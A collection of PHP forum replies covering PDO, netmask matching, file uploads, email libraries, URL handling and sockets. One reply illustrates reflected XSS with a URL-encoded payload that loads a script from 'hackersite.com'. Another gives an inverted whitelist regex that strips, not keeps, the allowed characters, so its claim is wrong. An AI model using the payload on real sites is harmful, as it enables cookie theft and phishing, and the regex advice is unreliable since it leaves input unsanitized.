kicken

Just extend the PDO class and add your own methods to it. class MyDB extends PDO { public function select(){/*...*/} public function update(){/*....*/} ///... }

Use the netmask to and ip2long to compare. $offices = array( array('mask' => 0xFFFFFF00, 'base' => ip2long('10.44.6.0') //... ); $ip = ip2long('10.44.6.56'); //whatever client's IP is foreach ($offices as $off){ if (($ip&$off['mask']) == $off['base']){ //it's this one } }

Or just put it in front of the text box. eg: <p>http://<input type="text"></p>

There is a big thread on devshed with various security notes and things to watch out for: Must read security notes Skimming through the posts there should provide at least some basic knowledge of what to a void and why, or at least introduce you to some terms to google for more information. Note that some of the early posts are fairly old and some items are a bit out dated. For example, the first post talkes about the magic_quotes_gpc which is not deprecated and typically disabled meaning you have to escape everything yourself (which is better). Take the early stuff with a grain of salt or maybe do a little research. Maybe read the thread backwards if you want to see the newer stuff first.

if (isset($_FILES['image']) && $_FILES['image']['error'] == UPLOAD_ERR_OK){ //a file was uploaded, run your include/update } That will only run the include file if a file was successfully uploaded. If you are doing additional validation checks inside your include file (file type, size, dimensions, etc) then you'll need a flag to indicate success of failure of that.

Download and install the SQL Srv driver for PHP from microsoft. I recommend using the PDO interface for the actual DB work in PHP.

Note that these types of protections need to be applied anywhere you have any type of user generated content, whether it comes from data put into the DB or just from a URL parameter. Say for instance you have a email form for sending an inquiry about a product, and you pass the product name in the URL to say, pre-fill the subject of the email form: www.example.com/inquiry.php?prod=Super+Delux+Widget then in your code: <input type="text" name="subject" value="Inquiry about <?php echo $_GET['prod']; ?>"> A malicious user could use that as an attack vector to inject code. For instance, a URL such as: www.example.com/inquiry.php?prod=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fhackersite.com%2Fscript.js%22%3E%3C%2Fscript%3E would cause the page to load and execute the JS located at http://hackersite.com/script.js. That script could do any number of things such as steal the cookies, redirect them to a phishing site, re-write your site, etc. For that type of attack, they don't even have to sign up or register or anything on your site, just get users to follow that special URL, say via a spam email or other site promising a discount or something. edit: I feel that I should clarify that "user generated content" does not just mean something that a user types in on a form on your site. It includes any data you get from an uncontrollable source, such as any url, post, or cookie variable. In the example above, the intent is that on each of your individual product pages, you would set the prod parameter to that products name. It's not intended that the user ever enter it manually or change it from what you have set. However since it is just a url variable it is quite easy and possible for someone to change it, that is why you need to take the precautions regardless.

Assuming your talking about the JS alert window that popups up with the source code. a) Wrong forum, that's nothing to do with PHP. b) It's not an error, your intentionally doing that: function(responseText){ alert(responseText); <---------------- HERE $("#result").html(responseText); var garttotal=$('#granttot2').val(); $('#finalamount').val(garttotal); },

That is generally know as "short-circuit"ing and yes, php does do that. As soon as the condition is satisfied it will stop evaluating the remaining conditions.

If you wanted a row counter as well as the data, you could use a for loop in this fashion: for ($i=0; $row=mysql_fetch_row($res); $i++){ //$row has the data //$i is the row number } Using your for loop variable (ie, $i) is not required in any language. In most cases though you need it because that is how you access the data. As mentioned, when you want to loop over something but don't need a counter (which is typically the case with db results) you're better off just using a while() loop and avoid the variable all together. As for your two examples, a single call to mysql_fetch_array/assoc is better than several calls to mysql_result.

I ended up finding SwiftMailer which seems to have the features that I want. I've setup a spool transport that saves the messages in the database, and then I can read them out later to send them out.

Hi All, I'm looking for any suggestions for a library to use for composing and sending emails in PHP. Here's my main feature requests: - Sending via SMTP (with auth) - Mime support (html/text parts, attachments) - Separate classes for message generation/mail delivery The reason I want separate classes for the delivery and the message generation is because I want to be able to have to separate delivery types for use on the site: 1) Instant delivery where the mail is sent to the smtp server right away 2) Queued delivery where the mail is stored in a queue (database or similar) and sent later (by a separate process). The instant delivery will be used for messages such as a registration confirmation or password recovery link. The queued delivery is for mass and low priority mailings (eg, news letters, automatic notifications, etc) so the users do not have to sit and wait while the mails go out. So what I had in mind was to create an EmailMessage class where I set properties/use methods that generate the full message (headers/body) and a EmailDelivery class that will handle sending the message via whichever delivery method I choose for that instance (instant vs queued). My EmailMessage class would just use the Mime generation abilities of the library while the instant delivery implementation would use the mail delivery part (smtp class). From my quick looking around PHPMailer seems popular, but it's all-in-one without the separation I was hoping for. It seems also that it would not be easy to just plug in a different transport agent to use as my queued delivery. It seems to be hard-coded for it's transports rather than plug-n-play style. The PEAR classes are separated like I want, but I find their API's to be a bit clunky to use. It is also designed for PHP4 and causes a few warnings (eg, from using $obj =& new Class()) out of the box. They can be fixed, but I prefer not having to modify the library's core files. I'm not currently using any framework, and I'd prefer to avoid bringing in a full framework just for email classes. Looking for any suggestions on solutions that fit my desires. Also open to suggestions on my proposed setup if anyone has any, or knows of a library that might work well with a slight design change. Thanks

Assuming your includes only define functions or classes and do not have any code that would run, then someone loading them in the browser is harmless, they would just get a blank page and your script would essentially do nothing. If your files do have some code that runs, then you'd have to decide whether it can cause and problems or not. For instance, if you have a file that you include which connects to your DB, someone running it directly is probably harmless as it would just connect then immediately disconnect when the script ends. However, if you do want to prevent people from accessing them directly then you have some options: 1) (preferred) Store all your includes in a directory that is outside of your web root. This way the web server will not serve them and nobody can access them. Your scripts will still be able to include them as they can access things out of the web root. 2) Configure the server to deny requests for that directory. For apache you can do this via .htaccess. Other servers have their own ways most likely. 3) Include a little check at the top which will check if the current request is for that file and if so die().

Cross posted @ devshed

Just use the installer to set it up, that way it takes care of installing it as a service and starting it up. You can learn about configuring it later by opening the my.ini file and reading through the comments and associated documentation in the manual.

You should select only the fields you need. Not so much due to security like your thinking, but more due to not wasting resources. There is no need to transfer all the data from all the fields from mysql to your script if your only going to use one or two of them. If you just select * in a query where your joining many tables, you could end up transferring a lot of extra unnecessary data. Also, if you have things indexed and you only need the indexed fields, mysql can return the data much faster by looking only at the indexes. If you select all fields it has to hit the data file to extract all the un-indexed columns data when you don't actually need it. Lastly, it makes it easier to understand your scripts because all the fields your using will be clearly listed in the query, rather than having to guess based on the array keys used throughout the code.

http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html#rewriterule Rewrite rules can be chained together so something can be re-written multiple times. Using [L] will cause the process to stop after the rule is applied. There are many flags that can be set. The manual page I linked above explains all of them.

HTTP Context Options - You can set the timeout option in the context to control how long php will wait on the resource. Then just handle errors properly. <?php $ctx = stream_context_create(array( 'http' => array( 'timeout' => 5.0 //wait 5 seconds max ) )); $xml = @file_get_contents($url, false, $ctx); if ($xml===false){ $error="Could not fetch contents..."; } else { $r = new SimpleXMLElement($xml); } No, script means the whole script. If the script timeout (set via set_time_limit or in php.ini) is exceeded the script is killed with a fatal error.

You just have to urlencode() the value before you stick it into the url. If your still having problems after that, you'll have to post code so we can see where you've made the mistake.

Decide which characters you'll allow then remove everything else using a regex. $re = '/[a-z0-9]/i'; $UserInput = preg_replace($re, '', $UserInput); Would allow only A-Z (upper and lower) and 0-9

if (!isset($json['Poster'])){ //not found } else { //found }

Unless a URL begins with http:// or https://, then it is treated as a relative URL. If it begins with a '/' it refers to the root but uses the current domain name/scheme. Otherwise, it is based on your current directory. So your base of 'localhost/ICU' combined with '/index.php' = 'localhost/ICU/index.php' Since it doesn't start with a '/' or a scheme, it is relative to the current directory, which is already http://localhost/ICU. 'http://localhost/ICU' + 'localhost/ICU/index.php' = 'http://localhost/ICU/localhost/ICU/index.php'

The best you can do is have your JS code for onbeforeunload fire off an ajax request to a PHP file. The browser may or may not run it, there's nothing you can do about that. Don't make anything depend on it.

Your socket is in non-blocking mode so your socket accept call will return false immediately when there is no connection pending. You need to determine if the failure is due to that, or due to an actual error. socket_last_error will help with that. Either that, or don't use non-blocking sockets.

File uploads are also limited by the following directives: upload_max_filesize max_file_uploads Check those values as well.